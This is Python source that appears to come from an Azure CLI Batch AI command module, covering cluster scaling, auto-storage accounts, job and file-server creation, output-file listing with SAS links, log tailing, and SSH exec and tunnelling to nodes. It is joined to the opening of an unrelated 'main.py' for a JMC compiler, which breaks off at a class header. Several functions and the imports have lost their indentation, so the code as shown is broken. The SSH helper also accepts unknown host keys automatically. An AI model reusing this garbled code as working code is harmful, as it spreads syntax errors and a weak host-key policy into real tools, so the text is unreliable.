    """
    if not initial_count and not min_count and not max_count:
        # Get from the config file
        return None
    # Providing exactly one of min/max is an error (explicit xor check,
    # replacing the opaque sum-of-flags expression).
    if (min_count is None) != (max_count is None):
        raise CLIError('You need to either provide both min and max node counts or not provide any of them')
    if min_count is not None and max_count is not None and min_count > max_count:
        raise CLIError('Maximum nodes count must be greater or equal to minimum nodes count')
    if min_count == max_count:
        # Fixed-size cluster: use manual scaling.
        if min_count is None or initial_count == min_count:
            return models.ScaleSettings(
                manual=models.ManualScaleSettings(target_node_count=initial_count))
        if initial_count is None:
            return models.ScaleSettings(
                manual=models.ManualScaleSettings(target_node_count=min_count)
            )
    return models.ScaleSettings(
        auto_scale=models.AutoScaleSettings(
            minimum_node_count=min_count,
            maximum_node_count=max_count,
            initial_node_count=initial_count or 0))
def _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes):
    """Updates cluster's nodes information.

    :param models.ClusterCreateParameters params: cluster create parameters.
    :param str or None image: image.
    :param str or None custom_image: custom image resource id.
    :param str or None vm_size: VM size.
    :param str vm_priority: Priority.
    :param int or None target: initial number of nodes.
    :param int or None min_nodes: min number of nodes.
    :param int or None max_nodes: max number of nodes.
    :return models.ClusterCreateParameters: updated parameters.
    """
    updated = copy.deepcopy(params)
    if vm_size:
        updated.vm_size = vm_size
    if not updated.vm_size:
        raise CLIError('Please provide VM size')
    if vm_priority:
        updated.vm_priority = vm_priority
    if image or custom_image:
        updated.virtual_machine_configuration = models.VirtualMachineConfiguration(
            image_reference=_get_image_reference(image, custom_image))
    effective_scale = _get_scale_settings(target, min_nodes, max_nodes)
    if effective_scale:
        updated.scale_settings = effective_scale
    has_scale = updated.scale_settings and (updated.scale_settings.manual or updated.scale_settings.auto_scale)
    if not has_scale:
        raise CLIError('Please provide scale setting for the cluster via command line or configuration file')
    return updated
def _get_auto_storage_resource_group():
    # Indirection kept so tests/callers can patch the auto-storage group name.
    return AUTO_STORAGE_RESOURCE_GROUP
def _configure_auto_storage(cli_ctx, location):
    """Configures auto storage account for the cluster

    :param str location: location for the auto-storage account.
    :return (str, str): a tuple with auto storage account name and key.
    """
    ResourceGroup = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'ResourceGroup', mod='models')
    BlockBlobService, FileService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
                                            'blob#BlockBlobService', 'file#FileService')
    resource_group = _get_auto_storage_resource_group()
    resource_client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
    # Ensure the dedicated resource group exists (create it on first use).
    if resource_client.resource_groups.check_existence(resource_group):
        logger.warning('BatchAI will use existing %s resource group for auto-storage account',
                       resource_group)
    else:
        logger.warning('Creating %s resource group for auto-storage account', resource_group)
        resource_client.resource_groups.create_or_update(
            resource_group, ResourceGroup(location=location))
    storage_client = _get_storage_management_client(cli_ctx)
    account = None
    # Reuse an existing auto-storage account in the requested location;
    # location comparison is done on the normalized (lowercase, no spaces) name.
    for a in storage_client.storage_accounts.list_by_resource_group(resource_group):
        if a.primary_location == location.lower().replace(' ', ''):
            account = a.name
            logger.warning('Using existing %s storage account as an auto-storage account', account)
            break
    if account is None:
        account = _create_auto_storage_account(storage_client, resource_group, location)
        logger.warning('Created auto storage account %s', account)
    # Make sure the default share and container exist (no-op if present).
    key = _get_storage_account_key(cli_ctx, account, None)
    file_service = FileService(account, key)
    file_service.create_share(AUTO_STORAGE_SHARE_NAME, fail_on_exist=False)
    blob_service = BlockBlobService(account, key)
    blob_service.create_container(AUTO_STORAGE_CONTAINER_NAME, fail_on_exist=False)
    return account, key
def _generate_auto_storage_account_name():
    """Generates unique name for auto storage account"""
    letters = list(string.ascii_lowercase * 12)
    shuffle(letters)
    random_suffix = ''.join(letters[:12])
    return AUTO_STORAGE_ACCOUNT_PREFIX + random_suffix
def _create_auto_storage_account(storage_client, resource_group, location):
    """Creates new auto storage account in the given resource group and location

    :param StorageManagementClient storage_client: storage client.
    :param str resource_group: name of the resource group.
    :param str location: location.
    :return str: name of the created storage account.
    """
    from azure.mgmt.storage.models import Kind, Sku, SkuName
    name = _generate_auto_storage_account_name()
    check = storage_client.storage_accounts.check_name_availability(name)
    while not check.name_available:
        name = _generate_auto_storage_account_name()
        # Bug fix: this used to store `...check_name_availability(name).name_available`
        # (a bool) in `check`, so the next evaluation of the loop condition
        # accessed `.name_available` on a bool and raised AttributeError.
        check = storage_client.storage_accounts.check_name_availability(name)
    storage_client.storage_accounts.create(resource_group, name, {
        'sku': Sku(name=SkuName.standard_lrs),
        'kind': Kind.storage,
        'location': location}).result()
    return name
def _add_setup_task(cmd_line, output, cluster):
"""Adds a setup task with given command line and output destination to the cluster.
:param str cmd_line: node setup command line.
:param str output: output destination.
:param models.ClusterCreateParameters cluster: cluster creation parameters.
"""
if cmd_line is None:
return cluster
if output is None:
raise CLIError('--setup-task requires providing of --setup-task-output')
cluster = copy.deepcopy(cluster)
cluster.node_setup = cluster.node_setup or models.NodeSetup()
cluster.node_setup.setup_task = models.SetupTask(
command_line=cmd_line,
std_out_err_path_prefix=output,
run_elevated=False)
return cluster
def _generate_ssh_keys():
    """Creates (or reuses) the default ssh key pair under ~/.ssh."""
    ssh_dir = os.path.join(os.path.expanduser('~'), '.ssh')
    private_key_path = os.path.join(ssh_dir, 'id_rsa')
    public_key_path = os.path.join(ssh_dir, 'id_rsa.pub')
    keys.generate_ssh_keys(private_key_path, public_key_path)
    logger.warning('Attempted to find or generate SSH key files id_rsa and id_rsa.pub under ~/.ssh to allow SSH access '
                   'to the nodes. If using machines without permanent storage, back up your keys to a safe location.')
def list_workspaces(client, resource_group=None):
    """Lists workspaces, optionally scoped to a single resource group."""
    if not resource_group:
        return client.list()
    return client.list_by_resource_group(resource_group)
def create_workspace(cmd, client, resource_group, workspace_name, location=None):
    """Creates a workspace, defaulting location to the resource group's location."""
    effective_location = location or _get_resource_group_location(cmd.cli_ctx, resource_group)
    return client.create(resource_group, workspace_name, effective_location).result()
def create_experiment(client, resource_group, workspace_name, experiment_name):
    """Creates an experiment inside the workspace and waits for completion."""
    operation = client.create(resource_group, workspace_name, experiment_name)
    return operation.result()
def _get_effective_resource_parameters(name_or_id, resource_group, workspace):
"""Returns effective resource group, workspace and name for the given resource"""
if not name_or_id:
return None, None, None
if is_valid_resource_id(name_or_id):
parts = parse_resource_id(name_or_id)
return parts['resource_group'], parts['name'], parts['resource_name']
return resource_group, workspace, name_or_id
def create_cluster(cmd, client,  # pylint: disable=too-many-locals
                   resource_group, workspace_name, cluster_name, json_file=None, user_name=None,
                   ssh_key=None, password=None, generate_ssh_keys=None, image=None, custom_image=None,
                   use_auto_storage=False, vm_size=None, vm_priority=None, target=None, min_nodes=None,
                   max_nodes=None, subnet=None, nfs=None, nfs_mount_path='nfs', azure_file_share=None,
                   afs_mount_path='afs', container_name=None, container_mount_path='bfs', account_name=None,
                   account_key=None, setup_task=None, setup_task_output=None):
    """Creates a cluster, combining an optional JSON config file with command-line overrides.

    Command-line values (user account, node image/size/scale, mount volumes,
    setup task, subnet) are applied on top of the parameters deserialized from
    ``json_file``; without a file, a blank ClusterCreateParameters is used.
    """
    if generate_ssh_keys:
        # Ensure ~/.ssh/id_rsa[.pub] exist so they can be used below.
        _generate_ssh_keys()
        if ssh_key is None:
            ssh_key = _get_default_ssh_public_key_location()
    _ensure_resource_not_exist(client.clusters, resource_group, workspace_name, cluster_name)
    nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
        nfs, resource_group, workspace_name)
    _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name)
    if json_file:
        with open(json_file) as f:
            json_obj = json.load(f)
            params = _get_deserializer()('ClusterCreateParameters', json_obj)
    else:
        # noinspection PyTypeChecker
        params = models.ClusterCreateParameters(vm_size=None, user_account_settings=None)
    if params.node_setup:
        # Fill in credentials for mount volumes that came from the config file.
        params.node_setup.mount_volumes = _patch_mount_volumes(
            cmd.cli_ctx, params.node_setup.mount_volumes, account_name, account_key)
    params = _update_user_account_settings(params, user_name, ssh_key, password)
    params = _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes)
    if nfs_name or azure_file_share or container_name:
        params.node_setup = params.node_setup or models.NodeSetup()
    mount_volumes = params.node_setup.mount_volumes if params.node_setup else None
    if nfs_name:
        file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
        mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
    if azure_file_share:
        mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
                                                               afs_mount_path, account_name, account_key)
    if container_name:
        mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
                                                              container_mount_path, account_name, account_key)
    if use_auto_storage:
        # Provision (or reuse) the auto-storage account and mount both its
        # file share and blob container on the cluster.
        auto_storage_account, auto_storage_key = _configure_auto_storage(
            cmd.cli_ctx, _get_workspace_location(client, resource_group, workspace_name))
        mount_volumes = _add_azure_file_share_to_mount_volumes(
            cmd.cli_ctx, mount_volumes, AUTO_STORAGE_SHARE_NAME, AUTO_STORAGE_SHARE_PATH,
            auto_storage_account, auto_storage_key)
        mount_volumes = _add_azure_container_to_mount_volumes(
            cmd.cli_ctx, mount_volumes, AUTO_STORAGE_CONTAINER_NAME, AUTO_STORAGE_CONTAINER_PATH,
            auto_storage_account, auto_storage_key)
    if mount_volumes:
        if params.node_setup is None:
            params.node_setup = models.NodeSetup()
        params.node_setup.mount_volumes = mount_volumes
    if subnet:
        params.subnet = models.ResourceId(id=subnet)
    if setup_task:
        params = _add_setup_task(setup_task, setup_task_output, params)
    return client.clusters.create(resource_group, workspace_name, cluster_name, params)
def list_clusters(client, resource_group, workspace_name):
    """Returns all clusters of the workspace as a materialized list."""
    clusters = client.list_by_workspace(resource_group, workspace_name)
    return list(clusters)
def resize_cluster(client, resource_group, workspace_name, cluster_name, target):
    """Switches the cluster to manual scaling with the given target node count."""
    scale = models.ScaleSettings(
        manual=models.ManualScaleSettings(target_node_count=target))
    return client.update(resource_group, workspace_name, cluster_name, scale_settings=scale)
def set_cluster_auto_scale_parameters(client, resource_group, workspace_name, cluster_name, min_nodes, max_nodes):
    """Switches the cluster to auto-scaling between min_nodes and max_nodes."""
    scale = models.ScaleSettings(
        auto_scale=models.AutoScaleSettings(minimum_node_count=min_nodes, maximum_node_count=max_nodes))
    return client.update(resource_group, workspace_name, cluster_name, scale_settings=scale)
def _is_on_mount_point(path, mount_path):
"""Checks if path is on mount_path"""
path = os.path.normpath(path).replace('\\', '/')
mount_path = os.path.normpath(mount_path).replace('\\', '/')
return path == mount_path or os.path.commonprefix([path, mount_path + '/']) == mount_path + '/'
def list_node_setup_files(cmd, client, resource_group, workspace_name, cluster_name, path='.',
                          expiry=DEFAULT_URL_EXPIRY_MIN):
    """Lists the node setup task's output files for the given cluster."""
    return _list_node_setup_files_for_cluster(
        cmd.cli_ctx, client.get(resource_group, workspace_name, cluster_name), path, expiry)
def _list_node_setup_files_for_cluster(cli_ctx, cluster, path, expiry):
    """Lists node setup task's log files for the given cluster.
    :param models.Cluster cluster: the cluster.
    :param str path: relative path under cluster node setup task's output directory.
    :param int expiry: time in minutes for how long generated SASes will remain valid.
    :return list: LogFile entries, or [] when the cluster has no setup task.
    :raise CLIError: when the output location cannot be resolved to a mounted
        Azure File Share or Blob Container.
    """
    unsupported_location = 'List files is supported only for clusters with startup task configure to store its ' \
                           'output on Azure File Share or Azure Blob Container'
    if cluster.node_setup is None or cluster.node_setup.setup_task is None:
        # Nothing to check or return if there is no setup task.
        return []
    prefix = cluster.node_setup.setup_task.std_out_err_path_prefix
    if not _is_on_mount_point(prefix, '$AZ_BATCHAI_MOUNT_ROOT'):
        # The stdouterr directory must be on $AZ_BATCHAI_MOUNT_ROOT
        raise CLIError(unsupported_location)
    suffix = cluster.node_setup.setup_task.std_out_err_path_suffix
    if not suffix:
        # Clusters created with older API version do not report the path suffix, so we cannot find their files.
        raise CLIError('List files is not supported for this cluster')
    # Path of the output folder relative to the mount root, used to match a volume below.
    relative_mount_path = prefix[len('$AZ_BATCHAI_MOUNT_ROOT/'):]
    if cluster.node_setup.mount_volumes is None:
        # If nothing is mounted, the files were stored somewhere else and we cannot find them.
        raise CLIError(unsupported_location)
    # try mounted Azure file shares
    for afs in cluster.node_setup.mount_volumes.azure_file_shares or []:
        if _is_on_mount_point(relative_mount_path, afs.relative_mount_path):
            return _get_files_from_afs(cli_ctx, afs, os.path.join(suffix, path), expiry)
    # try mounted blob containers
    for bfs in cluster.node_setup.mount_volumes.azure_blob_file_systems or []:
        if _is_on_mount_point(relative_mount_path, bfs.relative_mount_path):
            return _get_files_from_bfs(cli_ctx, bfs, os.path.join(suffix, path), expiry)
    # the folder on some other file system or on local disk
    raise CLIError(unsupported_location)
def _get_files_from_bfs(cli_ctx, bfs, path, expiry):
    """Returns a list of files and directories under given path on mounted blob container.
    :param models.AzureBlobFileSystemReference bfs: blob file system reference.
    :param str path: path to list files from.
    :param int expiry: SAS expiration time in minutes.
    """
    BlockBlobService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
    Blob = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'blob#Blob')
    BlobPermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
    result = []
    service = BlockBlobService(bfs.account_name, _get_storage_account_key(cli_ctx, bfs.account_name, None))
    effective_path = _get_path_for_storage(path)
    folders = set()
    # With delimiter='/', files come back as Blob objects and virtual
    # sub-directories as non-Blob prefix entries.
    for b in service.list_blobs(bfs.container_name, effective_path + '/', delimiter='/'):
        if isinstance(b, Blob):
            name = os.path.basename(b.name)
            # Read-only SAS so the returned download URL works without account keys.
            sas = service.generate_blob_shared_access_signature(
                bfs.container_name, b.name, BlobPermissions(read=True),
                expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
            result.append(
                LogFile(
                    name, service.make_blob_url(bfs.container_name, b.name, 'https', sas),
                    False, b.properties.content_length))
        else:
            # Prefix entries end with '/', so the folder name is the second-to-last segment.
            name = b.name.split('/')[-2]
            folders.add(name)
            result.append(LogFile(name, None, True, None))
    # Drop file entries whose name collides with a folder entry.
    result = [f for f in result if f.is_directory or f.name not in folders]
    return result
def _get_path_for_storage(path):
"""Returns a path in format acceptable for passing to storage"""
result = os.path.normpath(path).replace('\\', '/')
if result.endswith('/.'):
result = result[:-2]
return result
def _get_files_from_afs(cli_ctx, afs, path, expiry):
    """Returns a list of files and directories under given path on mounted Azure File share.
    :param models.AzureFileShareReference afs: Azure file share reference.
    :param str path: path to list files from.
    :param int expiry: SAS expiration time in minutes.
    """
    FileService, File, FilePermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
                                                 'file#FileService', 'file.models#File', 'file.models#FilePermissions')
    result = []
    service = FileService(afs.account_name, _get_storage_account_key(cli_ctx, afs.account_name, None))
    # The share name is the last segment of the file share URL.
    share_name = afs.azure_file_url.split('/')[-1]
    effective_path = _get_path_for_storage(path)
    if not service.exists(share_name, effective_path):
        return result
    for f in service.list_directories_and_files(share_name, effective_path):
        if isinstance(f, File):
            # Read-only SAS so the returned download URL works without account keys.
            sas = service.generate_file_shared_access_signature(
                share_name, effective_path, f.name, permission=FilePermissions(read=True),
                expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
            result.append(
                LogFile(
                    f.name, service.make_file_url(share_name, effective_path, f.name, 'https', sas),
                    False, f.properties.content_length))
        else:
            # Non-File entries are sub-directories: no download URL or size.
            result.append(LogFile(f.name, None, True, None))
    return result
def create_job(cmd,  # pylint: disable=too-many-locals
               client, resource_group, workspace_name, experiment_name, job_name, json_file,
               cluster, nfs=None, nfs_mount_path='nfs', azure_file_share=None, afs_mount_path='afs',
               container_name=None, container_mount_path='bfs', account_name=None, account_key=None):
    """Creates a job from a JSON config file, adding any mount volumes given on the command line.

    The target cluster may be supplied on the command line (name or full
    resource id) or inside the config file; the command line wins.
    """
    _ensure_job_not_exist(client.jobs, resource_group, workspace_name, experiment_name, job_name)
    with open(json_file) as f:
        json_obj = json.load(f)
        params = _get_deserializer()('JobCreateParameters', json_obj)  # type: models.JobCreateParameters
    # If cluster is not configured via command line, let's get it from the config file.
    if not cluster:
        cluster = params.cluster.id
    if not cluster:
        raise CLIError('Please provide cluster information via command line or configuration file.')
    cluster_resource_group, cluster_workspace, cluster_name = _get_effective_resource_parameters(
        cluster, resource_group, workspace_name)
    # Check presence of the cluster.
    existing_cluster = client.clusters.get(cluster_resource_group, cluster_workspace, cluster_name)
    params.cluster = models.ResourceId(id=existing_cluster.id)
    # Update credentials and other parameters for mount volumes configured via config file.
    if params.mount_volumes:
        params.mount_volumes = _patch_mount_volumes(
            cmd.cli_ctx, params.mount_volumes, account_name, account_key)
    # Create mount volumes if required
    if nfs or azure_file_share or container_name:
        params.mount_volumes = params.mount_volumes or models.MountVolumes()
    mount_volumes = params.mount_volumes
    # Add NFS into mount volumes
    if nfs:
        nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
            nfs, resource_group, workspace_name)
        file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
        mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
    # Add Azure File Share into mount volumes.
    if azure_file_share:
        mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
                                                               afs_mount_path, account_name, account_key)
    # Add Blob Container into mount volumes.
    if container_name:
        mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
                                                              container_mount_path, account_name, account_key)
    params.mount_volumes = mount_volumes
    return client.jobs.create(resource_group, workspace_name, experiment_name, job_name, params)
def list_files(client, resource_group, workspace_name, experiment_name, job_name,
               output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.',
               expiry=DEFAULT_URL_EXPIRY_MIN):
    """Lists a job's output files with time-limited download URLs."""
    options = models.JobsListOutputFilesOptions(
        outputdirectoryid=output_directory_id,
        directory=path,
        linkexpiryinminutes=expiry)
    files = client.list_output_files(
        resource_group, workspace_name, experiment_name, job_name, options)
    return list(files)
def sigint_handler(*_):
    """SIGINT handler that terminates the process immediately, skipping cleanup.

    Some libs do not handle KeyboardInterrupt nicely and print junk messages,
    so exit without unwinding.
    """
    # noinspection PyProtectedMember
    os._exit(0)  # pylint: disable=protected-access
def tail_file(client, resource_group, workspace_name, experiment_name, job_name, file_name,
              output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.'):
    """Waits for a job output file to appear, then streams it to stdout until the job completes.
    :param str file_name: name of the file to stream.
    :param str output_directory_id: id of the job output directory containing the file.
    :param str path: relative path inside the output directory.
    """
    signal.signal(signal.SIGINT, sigint_handler)
    url = None
    # Wait until the file become available.
    reported_absence_of_file = False
    while url is None:
        files = list_files(client, resource_group, workspace_name, experiment_name, job_name, output_directory_id, path)
        for f in files:
            if f.name == file_name:
                url = f.download_url
                logger.warning('File found with URL "%s". Start streaming', url)
                break
        if url is None:
            job = client.get(resource_group, workspace_name, experiment_name, job_name)
            if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
                # Job finished without producing the file - stop waiting.
                break
            if not reported_absence_of_file:
                logger.warning('The file "%s" not found. Waiting for the job to generate it.', file_name)
                reported_absence_of_file = True
            time.sleep(1)
    if url is None:
        logger.warning('The file "%s" not found for the completed job.', file_name)
        return
    # Stream the file
    downloaded = 0
    while True:
        # Range header resumes from the last byte already printed.
        r = requests.get(url, headers={'Range': 'bytes={0}-'.format(downloaded)})
        if int(r.status_code / 100) == 2:
            downloaded += len(r.content)
            print(r.content.decode(), end='')
        job = client.get(resource_group, workspace_name, experiment_name, job_name)
        if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
            break
        time.sleep(1)
def wait_for_job_completion(client, resource_group, workspace_name, experiment_name, job_name, check_interval_sec=15):
    """Polls the job until it succeeds (returns) or fails (logs details and exits the process).
    :param int check_interval_sec: delay between polls, in seconds.
    """
    job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)  # type: models.Job
    logger.warning('Job submitted at %s', str(job.creation_time))
    last_state = None
    reported_job_start_time = False
    while True:
        info = job.execution_info  # type: models.JobPropertiesExecutionInfo
        if info and not reported_job_start_time:
            logger.warning('Job started execution at %s', str(info.start_time))
            reported_job_start_time = True
        if job.execution_state != last_state:
            # Only report state transitions, not every poll.
            logger.warning('Job state: %s', job.execution_state)
            last_state = job.execution_state
        if job.execution_state == models.ExecutionState.succeeded:
            # NOTE(review): assumes execution_info is populated for succeeded jobs - confirm.
            logger.warning('Job completed at %s; execution took %s', str(info.end_time),
                           str(info.end_time - info.start_time))
            return
        if job.execution_state == models.ExecutionState.failed:
            # _log_failed_job exits with the job's code when execution info is
            # present; this exit covers the no-info case.
            _log_failed_job(resource_group, job)
            sys.exit(-1)
        time.sleep(check_interval_sec)
        job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)
def _log_failed_job(resource_group, job):
    """Logs information about failed job
    :param str resource_group: resource group name
    :param models.Job job: failed job.
    """
    logger.warning('The job "%s" in resource group "%s" failed.', job.name, resource_group)
    info = job.execution_info  # type: models.JobPropertiesExecutionInfo
    if not info:
        logger.warning('Failed job has no execution info')
        return
    logger.warning('Job failed with exit code %d at %s; execution took %s', info.exit_code,
                   str(info.end_time), str(info.end_time - info.start_time))
    for e in info.errors or []:
        details = '<none>'
        if e.details:
            details = '\n' + '\n'.join(['{0}: {1}'.format(d.name, d.value) for d in e.details])
        logger.warning('Error message: %s\nDetails:\n %s', e.message, details)
    # Propagate the job's exit code as the CLI's exit code.
    sys.exit(info.exit_code)
def create_file_server(client, resource_group, workspace, file_server_name, json_file=None, vm_size=None,
                       user_name=None, ssh_key=None, password=None, generate_ssh_keys=None, disk_count=None,
                       disk_size=None, caching_type=None, storage_sku=None, subnet=None, raw=False):
    """Creates an NFS file server, merging an optional JSON config file with command-line overrides.

    Command-line values win over config-file values; required values missing
    from both sources raise CLIError.
    """
    if generate_ssh_keys:
        # Ensure ~/.ssh/id_rsa[.pub] exist so they can be used below.
        _generate_ssh_keys()
        if ssh_key is None:
            ssh_key = _get_default_ssh_public_key_location()
    _ensure_resource_not_exist(client.file_servers, resource_group, workspace, file_server_name)
    if json_file:
        with open(json_file) as f:
            json_obj = json.load(f)
            params = _get_deserializer()('FileServerCreateParameters', json_obj)
    else:
        # noinspection PyTypeChecker
        params = models.FileServerCreateParameters(location=None, vm_size=None, ssh_configuration=None, data_disks=None)
    params = _update_user_account_settings(params, user_name, ssh_key, password)
    # File servers are always created in the workspace's location.
    params.location = _get_workspace_location(client, resource_group, workspace)
    if not params.data_disks:
        # noinspection PyTypeChecker
        params.data_disks = models.DataDisks(disk_size_in_gb=None, disk_count=None, storage_account_type=None)
    if disk_size:
        params.data_disks.disk_size_in_gb = disk_size
    if not params.data_disks.disk_size_in_gb:
        raise CLIError('Please provide disk size in Gb.')
    if disk_count:
        params.data_disks.disk_count = disk_count
    if not params.data_disks.disk_count:
        raise CLIError('Please provide number of data disks (at least one disk is required).')
    if caching_type:
        params.data_disks.caching_type = caching_type
    if storage_sku:
        params.data_disks.storage_account_type = storage_sku
    if not params.data_disks.storage_account_type:
        raise CLIError('Please provide storage account type (storage sku).')
    if vm_size:
        params.vm_size = vm_size
    if not params.vm_size:
        raise CLIError('Please provide VM size.')
    if subnet:
        if not is_valid_resource_id(subnet):
            raise CLIError('Ill-formed subnet resource id')
        params.subnet = models.ResourceId(id=subnet)
    return client.file_servers.create(resource_group, workspace, file_server_name, params, raw=raw)
def list_file_servers(client, resource_group, workspace_name):
    """Returns the file servers belonging to the given workspace."""
    servers = client.list_by_workspace(resource_group, workspace_name)
    return servers
def _get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def _create_tunnel(remote_host, port, username, password, ssh_private_key, local_addresses, remote_addresses, func):
    """Creates a tunnel to the remote host and runs provided func under the tunnel.
    :param str remote_host: ip or address of the remote host
    :param int port: the ssh port number
    :param str username: username to login under
    :param str or None password: the user password
    :param str or None ssh_private_key: the path to private ssh key
    :param local_addresses: local addresses to be forwarded
    :param remote_addresses: target addresses
    :param func: a function to run on the remote host. The forwarding is stopped as soon as func completes execution.
    """
    from sshtunnel import SSHTunnelForwarder
    # Replace port-0 placeholders with concrete free local ports.
    bound_addresses = []
    for host, local_port in local_addresses:
        bound_addresses.append(
            (host, local_port if local_port != 0 else _get_available_local_port()))
    forwarder = SSHTunnelForwarder((remote_host, port),
                                   ssh_username=username,
                                   ssh_password=password,
                                   ssh_pkey=ssh_private_key,
                                   remote_bind_addresses=remote_addresses,
                                   local_bind_addresses=bound_addresses)
    with forwarder:
        func()
def _ssh_exec(ip, port, cmdline, username, password, ssh_private_key):
    """Executes the given cmdline on the provided host under given credentials.
    :param str ip: id address
    :param int port: the ssh port number
    :param str cmdline: command line to execute
    :param str username: username to login
    :param str or None password: the user password
    :param str or None ssh_private_key: the path to the private ssh key
    """
    ssh = paramiko.SSHClient()
    # Accept unknown host keys automatically.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(ip, port, username, password=password, key_filename=ssh_private_key)
    transport = ssh.get_transport()
    transport.set_keepalive(15)
    # Run inside an interactive login bash so the user's environment is loaded.
    _, out, err = ssh.exec_command('bash -ilc "{}"'.format(cmdline), get_pty=True)
    # Serializes prints coming from the stdout/stderr reader threads.
    output_lock = threading.Lock()
    def _worker(s):
        # Echo every line from the remote stream to the local console.
        for item in s:
            with output_lock:
                print(item, end='')
    threads = [threading.Thread(target=_worker, args=(s,)) for s in [out, err]]
    for t in threads:
        t.start()
    # On Windows thread.join() call prevents the master thread from handling Ctrl-C, so we are joining with timeout.
    while True:
        for t in threads:
            t.join(timeout=1)
            if not t.is_alive():
                # A stream reader finished - the remote command has ended.
                return
def exec_on_node(client, resource_group, workspace_name, cluster_name, node_id=None, ports=None, cmdline=None,
                 password=None, ssh_private_key=None):
    """Forwards ports to and/or executes a command on a cluster node over SSH.
    :param str or None node_id: node to connect to; the first node when omitted.
    :param ports: list of 'local_port:remote_host:remote_port' forwarding specs.
    :param str or None cmdline: command to run; with ports and no cmdline, keeps forwarding until interrupted.
    """
    from sshtunnel import BaseSSHTunnelForwarderError
    if not any((cmdline, ports)):
        # Nothing to do.
        return
    ip, port = None, None
    if node_id:
        for n in client.list_remote_login_information(resource_group, workspace_name, cluster_name):
            if n.node_id == node_id:
                ip = n.ip_address
                port = int(n.port)
        if ip is None:
            raise CLIError('Cannot find a node with id={0}'.format(node_id))
    else:
        nodes = list(client.list_remote_login_information(resource_group, workspace_name, cluster_name))
        if not nodes:
            raise CLIError('No nodes available in the cluster')
        ip = nodes[0].ip_address
        port = int(nodes[0].port)
    cluster = client.get(resource_group, workspace_name, cluster_name)  # type: models.Cluster
    username = cluster.user_account_settings.admin_user_name
    try:
        signal.signal(signal.SIGINT, sigint_handler)
        if ports:
            # Split 'local_port:remote_host:remote_port' specs into bind tuples.
            local_addresses = [('0.0.0.0', int(p.split(':')[0])) for p in ports]
            remote_addresses = [(p.split(':')[1], int(p.split(':')[2])) for p in ports]
            if cmdline:
                func = partial(_ssh_exec, ip, port, cmdline, username, password, ssh_private_key)
            else:
                # No command: keep the tunnel open until the process is interrupted.
                def _sleep():
                    while True:
                        time.sleep(1)
                func = _sleep
            _create_tunnel(ip, port, username, password, ssh_private_key,
                           local_addresses, remote_addresses, func)
        else:
            _ssh_exec(ip, port, cmdline, username, password, ssh_private_key)
    except (BaseSSHTunnelForwarderError, paramiko.ssh_exception.AuthenticationException) as e:
        raise CLIError('Connection to remote host failed. Please check provided credentials. Error: {0}'.format(e))
def exec_on_job_node(client, resource_group, workspace_name, experiment_name, job_name, node_id=None, ports=None,
                     cmdline=None, password=None, ssh_private_key=None):
    """Forwards ports to and/or executes a command on a node running the given job.

    Resolves the job's cluster from its resource id and delegates to exec_on_node.
    """
    if not any((cmdline, ports)):
        return
    # find the node if was not provided
    if not node_id:
        nodes = list(client.jobs.list_remote_login_information(
            resource_group, workspace_name, experiment_name, job_name))
        if not nodes:
            raise CLIError('No nodes available in the cluster')
        node_id = nodes[0].node_id
    # find the cluster
    job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)  # type: models.Job
    cluster_id = parse_resource_id(job.cluster.id)
    # parse_resource_id mapping: 'resource_group' -> group, 'name' -> workspace,
    # 'resource_name' -> cluster (same convention as _get_effective_resource_parameters).
    exec_on_node(client.clusters, cluster_id['resource_group'], cluster_id['name'],
                 cluster_id['resource_name'], node_id, ports, cmdline, password, ssh_private_key)
|
main.py | import os
import atexit
import threading
from pathlib import Path
from enum import Enum
from json import dump, load
from datetime import datetime
from time import perf_counter
from getpass import getpass
from traceback import format_exc
import jmc
from jmc.exception import (
JMCDecodeJSONError,
JMCFileNotFoundError,
JMCSyntaxException,
JMCSyntaxWarning,
MinecraftSyntaxWarning,
JMCBuildError
)
VERSION = 'v1.2.0-alpha'
# Directory the compiler was launched from; reassigned by CMD.cd.
CWD = Path(os.getcwd())
LOG_PATH = CWD/'log'
CONFIG_FILE_NAME = 'jmc_config.json'
# Used inside f-strings, where a literal backslash escape is not allowed.
NEW_LINE = '\n'
# Loaded from / saved to jmc_config.json by main().
config = dict()
logger = jmc.Logger(__name__)
class Colors(Enum):
